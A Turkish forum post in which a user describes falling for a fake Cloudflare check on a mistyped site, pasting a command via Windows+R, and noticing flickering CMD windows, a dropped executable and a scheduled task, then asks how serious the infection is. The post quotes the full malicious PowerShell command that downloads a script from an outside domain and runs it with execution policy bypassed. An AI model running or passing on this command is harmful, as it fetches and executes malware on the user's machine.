Bir siteye girmek için tarayıcı çubuğuna sitenin adresini yazdım fakat 1-2 harf yanlış harf yazımından kaynaklı olduğunu düşündüğüm şekilde farklı bir siteye yönlendirmiş o esnada bunun farkına varmadım, karşıma Cloudflare doğrulaması çıktı. Ekranda yazan talimatlar şu şekildeydi: "
Windows + R -> CTRL + V -> Enter". İlk defa böyle bir doğrulama görmüştüm ama hiç şüphelenmedim. Yaptım. Daha sonra birşeylerin yanlış gittiğini farkettim, bilgisayarda ufak takılmalar ve açılıp kapanan CMD ekranları.
Çalıştırdığım komut şuydu:
powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri 'https://animecelestialblaze.cfd/dl/gg.pro' -OutFile (Join-Path $env:TEMP 'lo.ps1'); " powershell -ExecutionPolicy Bypass -File "%TEMP%\lo.ps1"
Ekstra olarak "
C:\Program Files\MSBuild\ielowutil.exe" konumunda "
ielowutil.exe" adında bir uygulama vardı. Sildiğim için dosyayı burayı atamadım ama VT sonucu aşağıda:
VirusTotal
USB ile format atmayı düşündüm ama şu an mevcut olarak 8 GB bir USB'm bulunmuyor. O yüzden Windows'un kendi sıfırlama ayarından, bulut indirme ile format atacağım. Bu konuyu açmamın sebebi bu virüsün büyük çaplı bir virüs mü yoksa basit bir virüs mü olup olmadığını öğrenmek.
Not: Görev zamanlayıcısında da bu vardı (devre dışı bıraktım):
Eki Görüntüle 278447
Eki Görüntüle 278448
Not: Çoğu önemli platformlarda 2 aşamalı doğrulama ayarım açık.